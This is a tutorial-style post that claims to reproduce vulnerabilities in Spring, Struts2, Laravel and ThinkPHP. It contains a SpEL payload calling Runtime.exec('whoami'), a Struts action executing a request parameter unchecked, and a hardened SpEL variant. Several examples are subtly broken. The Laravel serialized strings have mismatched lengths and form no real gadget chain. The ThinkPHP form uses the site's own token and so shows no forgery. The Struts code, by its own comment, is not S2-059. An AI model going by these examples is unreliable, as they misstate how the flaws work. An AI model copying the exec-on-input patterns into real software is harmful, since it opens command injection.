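Framework Security: CVE Reproduction & Spring & Struts & Laravel & ThinkPHP Vulnerability Reproduction
Reproducing vulnerabilities covers a lot of ground, so below are a few common reproduction examples for Spring, Struts2, Laravel and ThinkPHP.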
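- Spring Expression Language (SpEL) vulnerability reproduction in the Spring framework:
```java
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.standard.SpelExpressionParser;

public class SpelVulnerability {
    public static void main(String[] args) {
        // Stands in for an expression string that came from user input.
        String payload = "T(java.lang.Runtime).getRuntime().exec('whoami')";
        ExpressionParser parser = new SpelExpressionParser();
        // Deliberately vulnerable: getValue() without an explicit context uses a
        // StandardEvaluationContext, which resolves T(...) type references and
        // lets the expression call arbitrary static methods.
        parser.parseExpression(payload).getValue();
    }
}
```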
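A hardened counterpart to the SpEL snippet above, as an added example that is not part of the original post: it evaluates the same untrusted string inside a `SimpleEvaluationContext`, which rejects the `T(...)` type reference. The `Order` class, the `evaluateUntrusted` helper and the sample expressions are hypothetical names constructed for illustration.

```java
import org.springframework.expression.EvaluationContext;
import org.springframework.expression.ExpressionException;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;

public class SpelHardened {

    // Hypothetical root object: the only data an expression is allowed to read.
    public static class Order {
        private final String status;
        public Order(String status) { this.status = status; }
        public String getStatus() { return status; }
    }

    private static final ExpressionParser PARSER = new SpelExpressionParser();

    // SimpleEvaluationContext supports a subset of SpEL: property reads on the
    // root object, but no T(...) type references, constructors or bean references.
    private static final EvaluationContext READ_ONLY =
            SimpleEvaluationContext.forReadOnlyDataBinding().build();

    /** Evaluates an untrusted expression against root; returns null if it is rejected. */
    public static Object evaluateUntrusted(String expression, Object root) {
        try {
            return PARSER.parseExpression(expression).getValue(READ_ONLY, root);
        } catch (ExpressionException e) {
            // Covers both parse and evaluation failures. Log the rejection:
            // a T(...) expression reaching this point is worth an alert.
            System.err.println("SpEL rejected: " + e.getMessage());
            return null;
        }
    }

    public static void main(String[] args) {
        Order order = new Order("PAID"); // constructed sample data

        // Legitimate expressions still work.
        System.out.println(evaluateUntrusted("status", order));
        System.out.println(evaluateUntrusted("status == 'PAID'", order));

        // The payload from the vulnerable snippet fails at the type lookup
        // and never reaches Runtime.exec().
        System.out.println(evaluateUntrusted(
                "T(java.lang.Runtime).getRuntime().exec('whoami')", order));
    }
}
```

Where user input does not need to be an expression at all, keeping it out of `parseExpression` entirely is the stronger fix; the restricted context is the fallback for cases where it does.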
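- S2-059 vulnerability reproduction in the Struts2 framework:
```java
import org.apache.struts2.ServletActionContext;

public class S2_059_Vulnerability {
    public void execute() throws Exception {
        // Simplified illustration: a request parameter reaches Runtime.exec()
        // unchecked. The actual S2-059 issue is forced double OGNL evaluation
        // of tag attributes, which this snippet does not reproduce.
        String param = ServletActionContext.getRequest().getParameter("param");
        Runtime.getRuntime().exec(param);
    }
}
```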
- Serialization vulnerability reproduction in the Laravel framework:
```php
<?php
use Illuminate\Contracts\Support\Arrayable;

class ArbitraryCode implements Arrayable {
    // Returns the serialized object strings used in this reproduction.
    public function toArray() {
        return [
            'O:21:"Illuminate\Support\Facades\":3:{s:5:"class";O:23:"Illuminate\Support\Facades\Facade":0:{}s:5:"alias";O:20:"Illuminate\Support\Str":0:{}s:12:"resolvedInstance";O:56:"Illuminate\Encryption\Encrypter":2:{s:8:"key";s:3:"key";s:13:"iv";s:16:"iv";}}',
            'O:23:"Illuminate\Support\Facades\Facade":0:{}',
            'O:56:"Illuminate\Encryption\Encrypter":2:{s:8:"key";s:3:"key";s:13:"iv";s:16:"iv";}'
        ];
    }
}

// Serialize the object; the risk arises when an application later passes
// such attacker-controlled data to unserialize().
$serialized = serialize(new ArbitraryCode());
```
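- Cross-site request forgery (CSRF) vulnerability reproduction in the ThinkPHP framework:
```php
<?php
use think\facade\Request;

// Wrapper controller class (name chosen here) so the method is valid PHP.
class Index {
    public function csrf() {
        // Generate a form token and emit a form that posts to the target action.
        $token = Request::token();
        echo '<form method="post" action="http://your-target.com/action">
<input type="hidden" name="' . $token . '" value="' . $token . '">
<input type="submit" value="Submit">
</form>';
    }
}
```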
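These code examples are for learning and testing only and must not be used for illegal activity. Reproduce vulnerabilities in a controlled environment and comply with all applicable laws and policies.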